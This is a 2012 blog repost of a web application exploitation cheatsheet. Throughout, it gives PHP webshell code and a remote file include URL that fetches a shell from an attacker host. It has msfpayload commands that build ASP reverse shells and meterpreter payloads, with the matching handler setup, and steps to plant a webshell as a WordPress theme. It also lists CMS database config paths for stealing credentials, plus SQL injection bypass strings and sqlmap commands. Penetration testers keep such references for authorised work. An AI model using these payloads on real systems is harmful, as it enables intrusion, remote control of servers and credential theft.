Apr 19, 2012

Web Application exploitation - a cheatsheet By Tim Arneaud

If you want to get the full article, please go to the Source.


WebShell Backdoors
Minimal php command shells

file cmd.php: PHP script text =>

<?php system($_GET['cmd']) ?>

or

<?php system($_REQUEST['cmd']); ?>

Example usage via Remote File Include (RFI):

http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php


Encoding windows reverse command shell as asp

msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp

Encoding meterpreter in asp

msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp

------

attacker msfconsole:

use multi/exploit/handler

set payload windows/meterpreter/reverse_tcp

set LHOST <attacker-ip>

set LPORT <attacker-multi-handler-port>

exploit


Specific Web applications

Joomla

Joomla default database configuration filename

<web-app-path>/configuration.php

Scanning Joomla! for plugins and versions

/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>

/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla


WordPress

WordPress
 default database configuration filename
<web-app-path>

WordPress default login page

<web-app-path>
/wp-login.php
WordPress plugins

<web-app-path>
/wp-content/plugins
Scanning WordPress for plugins and versions

/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]

/pentest/enumeration/web/cms-explorer 
 -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:

mkdir wpx

vi wpx/cmd.php

cat wpx/cmd.php

<?php system($_GET['cmd']) ?>

zip -r wpx.zip wpx

upload wpx.zip via web interface as an installed theme

Command execution access is via: 

<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)> 

Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)


Cacti

Cacti default database configuration filename

<web-app-path>
/include/config.php

DeV!L`z ClanPortal

DeV!L`z ClanPortal default database configuration filename

<web-app-path>
/inc/mysql.php

Drupal

Drupal
 default database configuration filename
<web-app-path>
/sites/default/settings.php

Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer  -url <target-and-drupal-path> -type drupal

Timeclock
Timeclock default database configuration filename
<web-app-path>/db.php
 
SQL Terminators/Comments
MSSQL and MySQL:

<sql injected command>;--

MySQL:

<sql injected command>;#


Login Pages Basic SQL injection 

MS IIS

' OR '1=1';--


MySQL

'OR 1=1--


SQLMap commands

cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator

./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba



Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

If you like my blog, Please Donate Me

No comments:

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |